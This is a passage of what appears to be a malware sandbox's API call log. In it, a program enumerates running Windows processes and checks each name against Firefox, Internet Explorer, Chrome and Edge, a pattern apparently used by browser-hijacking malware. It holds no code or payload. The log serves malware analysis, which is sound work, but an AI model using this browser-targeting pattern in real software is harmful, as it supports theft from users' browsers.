(lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0181.311] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0181.311] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.311] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0181.311] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0181.311] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0181.311] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0181.311] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.311] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0181.312] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0181.312] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0181.312] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0181.312] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.312] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0181.313] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0181.313] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0181.313] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0181.313] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.313] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.313] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.313] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.313] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.313] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.313] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.314] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.314] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.314] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.314] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.314] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.314] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.314] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.314] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.314] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.314] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.315] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.315] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.315] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.315] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.315] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.315] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.315] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.315] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.315] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.315] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0181.316] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0181.316] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0181.316] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0181.316] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.316] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.317] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.317] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.317] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.317] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.317] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.317] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.317] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.317] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.317] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.317] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0181.318] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0181.318] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0181.318] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0181.318] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.318] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0181.318] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0181.318] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0181.318] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0181.318] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.318] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0181.319] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0181.319] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0181.319] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0181.319] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.319] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.319] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.319] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.319] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.319] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.320] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0181.320] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0181.320] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0181.320] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0181.320] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.320] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0181.321] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0181.321] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0181.321] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0181.321] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.321] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0181.321] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0181.321] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0181.321] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0181.321] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.321] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0181.322] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0181.322] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0181.322] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0181.322] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.322] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0181.322] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0181.322] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0181.322] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0181.322] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.322] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0181.323] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0181.323] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0181.323] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0181.323] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.323] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0181.323] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0181.323] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0181.324] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0181.324] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.324] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0181.324] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0181.324] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0181.324] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0181.324] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.324] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0181.325] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0181.325] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0181.325] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0181.325] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.325] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0181.325] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0181.325] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0181.325] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0181.325] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.325] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0181.326] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0181.326] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0181.326] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0181.326] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.326] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0181.326] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0181.326] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0181.326] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0181.326] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.326] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0181.327] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0181.327] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0181.327] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0181.327] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.327] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0181.328] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0181.328] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0181.328] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0181.328] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.328] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0181.328] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0181.328] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0181.328] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0181.328] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.328] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0181.329] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0181.329] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0181.329] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0181.329] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.329] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0181.329] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0181.329] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0181.329] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0181.329] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.329] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0181.330] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0181.330] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0181.330] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0181.330] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.330] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0181.331] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0181.331] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0181.331] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0181.331] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.331] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0181.331] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0181.331] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0181.331] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0181.331] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.331] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0181.332] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0181.332] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0181.332] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0181.332] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.332] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0181.332] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0181.332] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0181.332] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0181.332] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.332] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.333] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0181.333] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0181.333] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0181.333] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.333] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.333] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.333] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.333] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.333] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.334] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0181.334] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0181.334] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0181.334] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0181.334] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.334] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: 